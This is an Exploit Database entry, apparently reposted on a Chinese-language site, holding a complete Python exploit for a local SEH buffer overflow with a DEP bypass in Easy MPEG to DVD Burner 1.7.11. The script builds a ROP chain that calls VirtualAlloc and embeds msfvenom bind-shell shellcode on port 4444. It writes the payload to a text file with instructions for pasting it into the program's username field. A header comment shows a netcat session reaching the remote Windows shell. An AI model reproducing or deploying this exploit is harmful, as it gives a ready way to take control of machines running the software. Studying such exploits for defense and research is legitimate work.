Easy MPEG to DVD Burner 1.7.11 – Local Buffer Overflow (SEH) (DEP Bypass)

• Exploit Database
• 99 阅读

• 作者： Juan Prescotto
  日期： 2018-05-20
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/44658/

• #!/usr/bin/python
  
  #------------------------------------------------------------------------------------------------------------------------------------#
  # Exploit: Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass Local Buffer Overflow #
  # Date: 2018-05-19 #
  # Author: Juan Prescotto #
  # Tested Against: Win7 Pro SP1 64 bit#
  # Software Download #1: https://downloads.tomsguide.com/MPEG-Easy-Burner,0301-10418.html #
  # Software Download #2: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe#
  # Version: 1.7.11#
  # Special Thanks to my wife for allowing me spend countless hours on this passion of mine#
  # Credit: Thanks to Marwan Shamel (https://www.exploit-db.com/exploits/44565/) for his work on the original SEH exploit#
  # Steps : Open the APP > click on register > Username field > paste in contents from the .txt file that was generated by this script #
  #------------------------------------------------------------------------------------------------------------------------------------#
  # Bad Characers: \x00\x0a\x0d#
  # SEH Offset: 1012 #
  # Non-Participating Modules: SkinMagic.dll & Easy MPEG to DVD Burner.exe #
  #------------------------------------------------------------------------------------------------------------------------------------#
  # root@kali:~/Desktop# nc -nv 10.0.1.14 4444 #
  # (UNKNOWN) [10.0.1.14] 4444 (?) open#
  # Microsoft Windows [Version 6.1.7601] #
  # Copyright (c) 2009 Microsoft Corporation. All rights reserved. #
  ##
  # C:\Program Files (x86)\Easy MPEG to DVD Burner>#
  #------------------------------------------------------------------------------------------------------------------------------------#
  
  # My register setup when VirtualAlloc() is called (Defeat DEP) :
  #--------------------------------------------
  # EAX = Points to PUSHAD at time VirtualAlloc() is called (Stack Pivot jumps over it on return)
  # ECX = flProtect (0x40)
  # EDX = flAllocationType (0x1000)
  # EBX = dwSize (0x01)
  # ESP = lpAddress (automatic)
  # EBP = ReturnTo (stack pivot into a rop nop / jmp esp)
  # ESI = ptr to VirtualAlloc()
  # EDI = ROP NOP (RETN)
  
  import struct
  
  def create_rop_chain():
  
  rop_gadgets = [
  #***START VirtualAlloc() to ESI***
  0x10027e6b,# POP EAX # RETN [SkinMagic.dll] ** 
  0x1003b1d4,# ptr to &VirtualAlloc() [IAT SkinMagic.dll]
  0x100369a1,# MOV EAX,DWORD PTR DS:[EAX] # RETN [SkinMagic.dll] 
  0x10032993,# POP EBX # RETN [SkinMagic.dll] 
  0xffffffff,#
  0x10037bd3,# INC EBX # FPATAN # RETN [SkinMagic.dll]
  0x10037bd3,# INC EBX # FPATAN # RETN [SkinMagic.dll]
  0x10037bc0,# POP EDX # RETN [SkinMagic.dll]
  0xffffffff,#
  0x10035a07,# ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN [SkinMagic.dll]
  0x10037654,# POP EAX # RETN [SkinMagic.dll] 
  0xa141dffb,# 
  0x100317c8,# ADD EAX,5EFFC883 # RETN [SkinMagic.dll] Gets us to #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
  0x1003248d,# PUSH EAX # RETN [SkinMagic.dll] | Calls #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
  0x41414141,# FILLER
  0x1003993e,# PUSH EDX # ADD AL,5F # POP ESI # POP EBX # RETN 0x0C [SkinMagic.dll]
  0x41414141,# FILLER
  0x41414141,# FILLER
  0x41414141,# FILLER
  0x41414141,# FILLER
  0x41414141,# FILLER
  #***END VirtualAlloc() to ESI***
  
  #***START 0x40 to ECX***
  0x100185fb,# XOR EAX,EAX # RETN [SkinMagic.dll]
  0x41414141,# FILLER
  0x41414141,# FILLER
  0x41414141,# FILLER
  0x10037c5b,# ADD EAX,40 # POP EBP # RETN [SkinMagic.dll]
  0x41414141,# FILLER
  0x10032176,# XCHG EAX,ECX # ADD EAX,20835910 # ADD BYTE PTR DS:[ECX+10059130],AH # MOV DWORD PTR DS:[1005912C],EAX # RETN [SkinMagic.dll]
  #***END 0x40 to ECX***
  
  #***START 0x1000 to EDX***
  0x10032993,# POP EBX # RETN [SkinMagic.dll] 
  0xaaaaaaaa,#
  0x10037bc0,# POP EDX # RETN [SkinMagic.dll]
  0x55556556,#
  0x10037654,# POP EAX # RETN [SkinMagic.dll] 
  0xa141dffb,# 
  0x100317c8,# ADD EAX,5EFFC883 # RETN [SkinMagic.dll] Gets us to #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
  0x1003248d,# PUSH EAX # RETN [SkinMagic.dll] | Calls #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
  0x41414141,# FILLER
  #***END 0x1000 to EDX***
  
  #*** Start EBP = ReturnTo (stack pivot into a rop nop / jmp esp)***
  0x1002829d,# POP EBP # RETN [SkinMagic.dll]
  0x41414141,# FILLER
  0x41414141,# FILLER
  0x41414141,# FILLER
  0x41414141,# FILLER
  0x100284f8,# {pivot 16 / 0x10} :# ADD ESP,0C # POP EBP # RETN [SkinMagic.dll]
  #*** END EBP = ReturnTo (stack pivot into a rop nop / jmp esp)***
  
  #***START 0x1 to EBX***
  0x10032993,# POP EBX # RETN [SkinMagic.dll] 
  0xffffffff,#
  0x10037bd3,# INC EBX # FPATAN # RETN [SkinMagic.dll] 
  0x10037bd3,# INC EBX # FPATAN # RETN [SkinMagic.dll]
  #***END 0x1 to EBX***
  
  #***START ROP NOP to EDI***
  0x100342f0,# POP EDI # RETN [SkinMagic.dll] 
  0x10032158,# RETN (ROP NOP) [SkinMagic.dll]
  #***END ROP NOP to EDI***
  
  #***START Gadgets to execute PUSHAD / Execute VirtualAlloc()***
  0x10037654,# POP EAX # RETN [SkinMagic.dll] 
  0xa140acd2,# CONSTANT
  0x100317c8,# ADD EAX,5EFFC883 # RETN [SkinMagic.dll] (Puts location of a PUSHAD into EAX "0x00407555", # PUSHAD # RETN [Easy MPEG to DVD Burner.exe]
  0x1003248d,# PUSH EAX # RETN [SkinMagic.dll] | Calls #0x00407555, # PUSHAD # RETN [Easy MPEG to DVD Burner.exe]
  #***END Gadgets to execute PUSHAD***
  
  #***After Return from VirtualAlloc() / stack pivot land in ROP NOP Sled / jmp ESP --> Execute Shellcode***
  0x10032158,# RETN (ROP NOP) [SkinMagic.dll]
  0x10032158,# RETN (ROP NOP) [SkinMagic.dll]
  0x10032158,# RETN (ROP NOP) [SkinMagic.dll]
  0x10032158,# RETN (ROP NOP) [SkinMagic.dll]
  0x1001cc57,# & push esp # ret[SkinMagic.dll]
  ]
  return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
  
  rop_chain = create_rop_chain()
  
  nop_rop_chain_1 = "\xbd\xdd\x02\x10" * 18 # 0x1002ddbd : {pivot 12 / 0x0c} :# ADD ESP,0C # RETN [SkinMagic.dll]
  nop_rop_chain_2 = "\x58\x21\x03\x10" * 22 # RETN (ROP NOP) [SkinMagic.dll]
  seh = "\x06\x4e\x40" # 0x00404e06 : {stack pivot 1928 / 0x788} (Lands us into rop nop chain --> rop_chain) :# POP EDI # POP ESI # POP EBP # MOV DWORD PTR FS:[0],ECX # POP EBX # ADD ESP,778 # RETN [Easy MPEG to DVD Burner.exe]
  nop = "\x90" * 20
  
  #Max Space Avaliable for Shellcode = 600 bytes
  #------------------------------------------------------------------------------------#
  # msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x0a\x0d' -f py -v shellcode #
  # x86/shikata_ga_nai succeeded with size 355 (iteration=0) #
  #------------------------------------------------------------------------------------#
  shellcode =""
  shellcode += "\xb8\x50\x08\x0f\xf2\xd9\xe9\xd9\x74\x24\xf4\x5b"
  shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x93"
  shellcode += "\x0c\xed\x07\xef\xe5\x73\xe7\x0f\xf6\x13\x61\xea"
  shellcode += "\xc7\x13\x15\x7f\x77\xa4\x5d\x2d\x74\x4f\x33\xc5"
  shellcode += "\x0f\x3d\x9c\xea\xb8\x88\xfa\xc5\x39\xa0\x3f\x44"
  shellcode += "\xba\xbb\x13\xa6\x83\x73\x66\xa7\xc4\x6e\x8b\xf5"
  shellcode += "\x9d\xe5\x3e\xe9\xaa\xb0\x82\x82\xe1\x55\x83\x77"
  shellcode += "\xb1\x54\xa2\x26\xc9\x0e\x64\xc9\x1e\x3b\x2d\xd1"
  shellcode += "\x43\x06\xe7\x6a\xb7\xfc\xf6\xba\x89\xfd\x55\x83"
  shellcode += "\x25\x0c\xa7\xc4\x82\xef\xd2\x3c\xf1\x92\xe4\xfb"
  shellcode += "\x8b\x48\x60\x1f\x2b\x1a\xd2\xfb\xcd\xcf\x85\x88"
  shellcode += "\xc2\xa4\xc2\xd6\xc6\x3b\x06\x6d\xf2\xb0\xa9\xa1"
  shellcode += "\x72\x82\x8d\x65\xde\x50\xaf\x3c\xba\x37\xd0\x5e"
  shellcode += "\x65\xe7\x74\x15\x88\xfc\x04\x74\xc5\x31\x25\x86"
  shellcode += "\x15\x5e\x3e\xf5\x27\xc1\x94\x91\x0b\x8a\x32\x66"
  shellcode += "\x6b\xa1\x83\xf8\x92\x4a\xf4\xd1\x50\x1e\xa4\x49"
  shellcode += "\x70\x1f\x2f\x89\x7d\xca\xda\x81\xd8\xa5\xf8\x6c"
  shellcode += "\x9a\x15\xbd\xde\x73\x7c\x32\x01\x63\x7f\x98\x2a"
  shellcode += "\x0c\x82\x23\x45\x91\x0b\xc5\x0f\x39\x5a\x5d\xa7"
  shellcode += "\xfb\xb9\x56\x50\x03\xe8\xce\xf6\x4c\xfa\xc9\xf9"
  shellcode += "\x4c\x28\x7e\x6d\xc7\x3f\xba\x8c\xd8\x15\xea\xd9"
  shellcode += "\x4f\xe3\x7b\xa8\xee\xf4\x51\x5a\x92\x67\x3e\x9a"
  shellcode += "\xdd\x9b\xe9\xcd\x8a\x6a\xe0\x9b\x26\xd4\x5a\xb9"
  shellcode += "\xba\x80\xa5\x79\x61\x71\x2b\x80\xe4\xcd\x0f\x92"
  shellcode += "\x30\xcd\x0b\xc6\xec\x98\xc5\xb0\x4a\x73\xa4\x6a"
  shellcode += "\x05\x28\x6e\xfa\xd0\x02\xb1\x7c\xdd\x4e\x47\x60"
  shellcode += "\x6c\x27\x1e\x9f\x41\xaf\x96\xd8\xbf\x4f\x58\x33"
  shellcode += "\x04\x7f\x13\x19\x2d\xe8\xfa\xc8\x6f\x75\xfd\x27"
  shellcode += "\xb3\x80\x7e\xcd\x4c\x77\x9e\xa4\x49\x33\x18\x55"
  shellcode += "\x20\x2c\xcd\x59\x97\x4d\xc4"
  
  exploit = nop_rop_chain_1 + nop_rop_chain_2 + rop_chain + nop + shellcode + "\x41" * (1012-len(nop_rop_chain_1)-len(nop_rop_chain_2)-len(rop_chain)-len(nop)-len(shellcode)) + seh
  
  f = open ("Exploit.txt", "w")
  f.write(exploit)
  f.close()
  

  PowerShell

  Copy